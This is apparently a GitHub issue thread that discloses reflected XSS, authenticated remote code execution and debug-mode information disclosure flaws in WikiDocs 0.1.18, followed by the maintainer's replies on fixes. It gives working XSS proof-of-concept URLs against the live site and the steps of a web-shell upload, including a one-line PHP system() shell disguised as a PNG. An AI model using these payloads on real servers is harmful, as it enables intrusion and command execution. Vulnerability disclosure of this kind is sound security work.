WikiDocs
WikiDocs copied to clipboard
Zavy86
Multiple Vulnerabilities in WikiDocs 0.1.18
CVE-2022-23376 / Multiple reflected XSS vulnerabilities on different pages.
1. (Template.inc.php) - Reflected XSS Injection
First vulnerability in line 47:
Second is in line 210:
XSS directly using url: https://www.wikidocs.it/?search=%3Csvg/onload=%27alert(%22XSS%22);%27%3E
2. (Submit.php) - Reflected XSS Injection
Vulnerability in line 31:
XSS directly using url: https://www.wikidocs.it/submit.php?act=%22});%3C/script%3E%3Csvg/onload=%27alert(%22XSS%22);%27%3E
3. (Index.php) - Reflected Xss Injection:
CVE-2022-23375 / Authenticated remote code execution vulnerability
(Index.php) - Image upload, Authenticated Remote Code Execution:
first, log in to the website and click edit button on the right top:
Before upload proccess, we have to create malicious payload image:
name: shell.php.png
payload :
<?php echo system($_REQUEST['cmd']); ?>
After that, you have to click image button on top and upload image:
Select malicious file and click upload:
In upload process, change file extension to the PHP in the POST request:
then the browser automatically sends another request to the malicious file:
Just browse it and try to execute some commands:
Information Disclosure Vulnerability (I did not reserve CVE for this one)
(Functions.inc.php) - Debug mode can be enabled:
Vulnerable lines are between 15-18:
You can get sensitive information using debug mode:
I hope you wil close these vulnerabilities ASAP.
In version 0.1.20 I tried to fix the shell bug. Can you check if you can still hack it?
Actually, your application is more secure right now because it does not accept any extension 😃
Parameter for enable and disable debug mode for Information Disclosure Vulnerability. v0.2.1
xss need to be fixed
https://www.wikidocs.it/?search=%3Csvg/onload=%27alert(%22XSS%22);%27%3E
https://www.wikidocs.it/submit.php?act=%22%7D);%3C/script%3E%3Csvg/onload=%27alert(%22XSS%22);%27%3E